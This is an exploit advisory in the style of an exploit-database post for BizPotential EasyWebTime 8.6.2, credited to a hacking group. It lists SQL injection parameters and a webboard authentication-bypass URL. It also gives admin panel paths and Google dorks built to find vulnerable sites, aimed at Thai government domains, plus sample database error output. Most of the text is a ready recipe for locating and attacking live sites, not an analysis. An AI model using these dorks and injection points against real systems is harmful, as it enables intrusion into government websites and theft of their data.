BizPotential EasyWebTime 8.6.2 SQL Injection / Bypass

1. #############################################################
2.  
3. # Exploit Title : BizPotential EasyWebTime 8.6.2 SQL Injection / Bypass
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 14/02/2019
7. # Vendor Homepage : bizpotential.com ~ ewtadmin.com
8. # Software Information Link : bizpotential.com/overview.php
9. # Software Affected Version : 8.6.2 and all previous versions.
10. # Software Price : 100$
11. # Tested On : Windows and Linux
12. # Category : WebApps
13. # Exploit Risk : Medium
14. # CWE : CWE-89 [ Improper Neutralization of
15. Special Elements used in an SQL Command ('SQL Injection') ]
16. CWE-592 - Authentication Bypass Issues
17. # CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018090088
18.  
19. #############################################################
20.  
21. BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability
22.  
23. #############################################################
24.  
25. # Google Dorks :
26. *****************
27.  
28. inurl:''/ewtadmin/'' site:go.th
29.  
30. inurl:''/main.php?filename='' site:go.th
31.  
32. inurl:''/ewtadmin/ewt/ccs/''
33.  
34. intext:''© Copyright 2007 - BizPotential.com - All Rights Reserved.''
35.  
36. intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved''
37.  
38. #############################################################
39.  
40. # Admin Control Panel Paths :
41. ***************************
42.  
43. /ewtadmin/index.php
44. /ewtadmin82/
45. /ewtcommittee/index2331.php
46. /ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php
47.  
48. #############################################################
49.  
50. # SQL Injection Exploit :
51. ********************
52.  
53. /n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection]
54.  
55. /ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection]
56.  
57. /more_news.php?offset=[SQL Injection]
58.  
59. /more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection]
60.  
61. #############################################################
62.  
63. # Webboard Exploit Bypass :
64. **************************
65.  
66. /ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard
67.  
68. # Webboard Directory Path :
69. **************************
70.  
71. /ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard
72.  
73. /index_question.php?wcad=5&t=1&filename=webboard
74.  
75. ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard
76.  
77. #############################################################
78.  
79. # Example SQL Database Errors =>
80. ********************************
81. SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y'
82. ORDER BY n_date DESC LIMIT -20,20
83. You have an error in your SQL syntax; check the manual that corresponds to your
84. MySQL server version for the right syntax to use near '-20,20' at line 1
85.  
86. SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve =
87. 'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end)
88. or (n_date_start = '' and n_date_end = '')) ORDER BY n_date
89. DESC,n_timestamp DESC LIMIT 60\\\',20
90. You have an error in your SQL syntax; check the manual that corresponds
91. to your MySQL server version for the right syntax to use near '\\\',20' at line 1
92.  
93. #############################################################
94.  
95. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
96.  
97. #############################################################